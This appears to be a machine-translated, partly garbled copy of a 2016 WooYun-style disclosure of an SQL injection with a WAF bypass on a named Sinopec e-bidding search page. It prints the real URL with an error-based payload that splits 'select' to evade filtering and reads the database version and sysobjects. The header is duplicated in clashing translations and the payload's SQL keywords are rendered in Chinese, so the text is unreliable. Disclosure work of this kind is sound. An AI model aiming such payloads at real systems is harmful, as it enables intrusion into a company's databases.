中石化某业务SQL注入漏洞(绕过WAF)

漏洞标题 中石化某业务SQL注入漏洞(绕过WAF) 相关厂商 中国石油化工股份有限公司 漏洞作者 路人甲 提交时间 2016-04-29 10:29 公开时间 2016-06-17 16:10 漏洞类…

漏洞标题 中石化企业SQL注入漏洞(绕过WAF) 相关制造商 中国石油化工股份有限公司 漏洞作者 过路人 提交时间 2016-04-29 10: 29 公共时间 2016-06-17 16: 10 漏洞类型 SQL注入漏洞 危险等级 在 自我评估等级 10 漏洞状态 制造商已确认 标签标签 漏洞详细信息 参数关键字在搜索功能中注入: http://ebidding.sinopec.com: 8880/TPWeb4AAA/Showinfo/SearchResult.aspx?keyword='查询内容'& searchtype=title

错误注入,应该有WAF并且不会继续深入 漏洞证明: http://ebidding.sinopec.com: 8880/TPWeb4AAA/Showinfo/SearchResult.aspx?& searchtype=title& keyword=1'exec('selec'%2b't convert(int,(@@ version))')选择名称orderNum,名称InfoDate,来自[sysobjects]的名称PubInWebDate,其中'1'='

修理计划: 版权声明:请注明出处。居民A @乌云